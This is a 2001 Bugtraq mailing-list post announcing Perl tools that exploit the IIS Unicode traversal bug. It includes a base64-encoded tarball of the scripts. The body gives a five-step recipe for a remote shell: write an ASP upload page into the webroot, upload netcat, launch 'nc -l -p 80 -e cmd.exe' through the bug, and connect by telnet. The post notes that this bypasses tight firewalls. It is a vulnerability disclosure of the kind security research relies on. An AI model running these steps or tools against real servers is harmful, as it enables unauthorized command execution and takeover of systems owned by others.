[18797] in bugtraq
shell on IIS server with Unicode using *only* HTTP
daemon@ATHENA.MIT.EDU (Roelof Temmingh)
Thu Jan 25 02:28:30 2001
Mime-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="0-757465055-980382610=:67247"
Message-Id: <Pine.BSF.4.21.0101250130460.67247-101000@wips.sensepost.com>
Date: Thu, 25 Jan 2001 02:30:10 +0200
Reply-To: Roelof Temmingh <roelof@SENSEPOST.COM>
From: Roelof Temmingh <roelof@SENSEPOST.COM>
X-To: info@sensepost.com
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--0-757465055-980382610=:67247
Content-Type: TEXT/PLAIN; charset=US-ASCII
(assumes an IIS server vulnerable for the Unicode bug)
Tarball contains two PERL scripts:
1. Unicode upload creator (unicodeloader.pl)
Works like this - two files (upload.asp and upload.inc - have
them in the same dir as the PERL script) are build in the webroot
(or anywhere else) using echo and some conversion strings.
These files allows you to upload any file by
simply surfing with a browser to the server.
Typical use: (5 easy steps to a shell)
1. Find the webroot (duh)
2. perl unicodeloader target:80 'webroot'
3. surf to target/upload.asp and upload nc.exe
4. perl unicodexecute3.pl target:80 'webroot/nc -l -p 80 -e cmd.exe'
5. telnet target 80
Above procedure will drop you into a shell on the box
without crashing the server (*winks at Eeye*).
This procedure is nice for servers that are very tightly
firewalled; servers that are not allowed to FTP, RCP or TFTP
to the Internet.
2. Unicodexecute version3 (unicodexecute3.pl)
same as before plus
-includes searches for alternative executable dirs
-more robust, stable than before
-checks for access denied etc. added
Regards,
Roelof.
------------------------------------------------------
Roelof W Temmingh SensePost IT security
roelof@sensepost.com +27 83 448 6996
http://www.sensepost.com
--0-757465055-980382610=:67247
Content-Type: APPLICATION/octet-stream; name="unitools.tgz"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.BSF.4.21.0101250230100.67247@wips.sensepost.com>
Content-Description:
Content-Disposition: attachment; filename="unitools.tgz"
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
xIktrgF4x0EHiRrVnzd//WbrF6Px66MWikpSP8bt9bn6vtV4vCbYK/FiEy9s
OVH9efiuuYf/thFVwXZx2klgv0EiL9TEM/w+4olbNxTuaT06ha2tK/vKcJgl
8GSPubLJ5PBT1DyixCpGXVpMfHLuTcsQk8uMm0qzm1Mw1xw1uBJN9DBB5I6R
fBJXccOFi+0FqAg61KI4eBymVEgbvbeA3+ZRnHUgVfcxfRgU+CI712UuxI/w
jnZTN4IqNz+n1gJi65w6JOxTRsG9EOGLu9dn8C88on+af1EHgLCWu9d9Nve8
f6XGRnUbG2XjsWfIDjY9xqJMeBRc5vu65E98RC83QIX/W7Dguichus99Y+5D
jtI2EDtktnguiEtFUuRR+24B08Bxx+TCJ/uUkXjNWjQfJd95E+aOxQyP90b3
+1OyLvdwqv3a8f7pwVFvUOu/2f2v0/6AXmmpnYl4FmLhPlrQM6fqk9iePTHe
v28mjZeqLltA1GzEcn0aKf254yqW2z56MxKeWfY56H1/e/3dt3qtLTslNdUQ
MThMyViu39U5niPhMaKhOkjKGiw0zbP/Vzf7W7KqwGwwjyaEX3t0ugGeJQtG
GfXkk7/+THb95dkj3EDZyxIGg703bwfIJRTxPPSJApL/oJxQLk+torg+kIVq
f+birjq1wvMOpPuEY8VWsXGkabc+O/tPGFf69p+Bxy3v/718/vK5ev73fO15
q43Ta831l6vnf19ilJ7/Xdt3huwBYOmFD35497HvdlSSJwlXnh3Uc89bMJ1i
LsY8wi/GURnKQX6g3u6owC2vf1Tgptc/5JpufwGkcuc3QJLnJNnbH7c/GjFN
86/0cOSOjxZuerLwif18pf20oZ80OR62oY+iJnVJ1tK/reueHv+LjffP0GB+
kNb8Rz8Q+PP38leN91Xj/fM13pf21W/vxv/BXfePbcn+eZvuhWbxp/SI/no9
5idxUtFY/MLLX6XD/OAN5VUrmUClL/wBrWSz9z+9v2Y7+Y594XzFl+9E3Rj+
Gc5Sn/jUuP+ExuYH1YVKeFCbaUmXyVveZoJin+k/rc30Z+4yrf05uktZd/Pz
8bil/wMv2y/T/k/z+RpOt563V7///CJjkzoIW5tUqG1txm7sia03nju2/Jje
UqM9A6NvJJzNhpzcbEjQUeAstrRNzHRTmIp4Ejhd8nDoHe0O/ve419WnmI3c
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
L9IBXAB4AAA=
--0-757465055-980382610=:67247--
